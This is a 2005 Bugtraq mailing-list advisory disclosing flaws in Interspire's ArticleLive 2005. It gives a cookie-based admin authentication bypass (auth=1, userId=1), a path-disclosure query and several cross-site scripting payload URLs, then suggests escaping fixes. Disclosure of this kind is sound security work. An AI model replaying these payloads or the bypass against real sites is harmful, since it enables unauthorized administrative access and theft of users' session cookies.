[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Authentication bypass, sql injections and xss in ArticleLive 2005
From: dcrab <dcrab () hackerscenter ! com>
Date: 2005-05-03 20:55:27
Message-ID: 20050503205527.1033.qmail () www ! securityfocus ! com
[Download RAW message or body]
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at \
http://www.digitalparadox.org/services.ah
***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! \
http://www.digitalparadox.org/services.ah
Looking for Publishers intrested in my Php Secure Coding Book.
Severity: High
Title: Authentication bypass, sql injections and xss in ArticleLive 2005
Date: 04/05/2005
Vendor: Interspire
Vendor Website: http://www.interspire.com/articlelive/
Summary: There are, authentication bypass, sql injections and xss in articlelive \
2005.
Proof of Concept Exploits:
http://www.example.com/admin/?
Full administrative authentication bypass
In the control panel, by setting your cookie to auth=1 and userId=1 would give you \
full administrative access.
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='Information \
DisclosureCategories=0 Full Path Disclosure
Warning: Wrong datatype for second argument in call to in_array in
/home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on \
line 460
Warning: Bad arguments to implode() in \
/home/httpd/vhosts/example.com/httpdocs/templates/Default \
(Stretched)/Panels/SearchResultsPanel.php on line 163
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
XSS
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592& \
Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
XSS
http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
XSS
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://digitalparadox.org/.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic